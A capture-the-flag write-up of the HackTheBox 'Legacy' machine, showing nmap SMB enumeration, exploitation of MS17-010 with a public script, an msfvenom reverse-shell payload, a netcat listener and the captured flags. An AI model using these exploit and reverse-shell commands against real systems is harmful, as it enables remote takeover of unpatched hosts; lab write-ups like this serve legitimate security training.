Post

HackTheBox Legacy

Writeup for HackTheBox Legacy

Posted Updated
By Edwin Tok
3 min read
HackTheBox Legacy

Machine Synopsis

Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access. (Source)

Key Exploitation Techniques:

  • SMB Enumeration (OS and vulnerable protocols)
  • EternalBlue Remote Code Execution (MS17-010 / CVE-2017-0143)

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

$ nmap -sC -sV -A 10.10.10.4  

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h57m47s, deviation: 1h24m51s, median: 4d23h57m47s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:f2:d3 (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-02-07T15:47:41+02:00

An nmap vulnerability script scan was used to confirm any presence of critical SMB vulnerabilities.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

$ nmap --script=vuln 10.10.10.4

PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false

The target was explicitly identified as vulnerable to MS17-010 (EternalBlue) and MS08-067 (Conficker).

Exploitation

Initial Access (NT AUTHORITY\SYSTEM)

The target’s Windows XP system was vulnerable to MS17-010, a remote code execution vulnerability in SMBv1.

A Python exploit script (e.g., send_and_execute.py from a dedicated MS17-010 GitHub repository) was used. This script sends a payload via SMB and executes it as a service

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010
$ cat send_and_execute.py

def send_and_execute(conn, arch):
	smbConn = conn.get_smbconnection()

	filename = "%s.exe" % random_generator(6)
	print "Sending file %s..." % filename


    #In some cases you should change remote file location
    #For example:
    #smb_send_file(smbConn, lfile, 'C', '/windows/temp/%s' % filename)
	#service_exec(conn, r'cmd /c c:\windows\temp\%s' % filename)    
	
	smb_send_file(smbConn, lfile, 'C', '/%s' % filename)
	service_exec(conn, r'cmd /c c:\%s' % filename)

A reverse shell payload (windows/shell_reverse_tcp) was generated using msfvenom as an executable (legacy.exe).

1

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe > legacy.exe

A netcat listener was set up to catch the reverse shell.

1
2

# Attacker machine: Netcat listener
$ nc -nlvp 1234

The send_and_execute.py script was executed, providing the target IP and the generated payload.

1
2
3
4
5
6

# Attacker machine: Execute exploit script
$ python send_and_execute.py 10.10.10.4 legacy.exe                     
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
...
Done

The exploit successfully delivered the payload, establishing a reverse shell with nt authority\system privileges.

1
2
3
4
5
6
7
8
9
10
11
12

listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd "C:\Documents and Settings\john\Desktop"
C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5713

The user.txt and root.txt flags were located on the system.

HackTheBox
windows
This post is licensed under CC BY 4.0 by the author.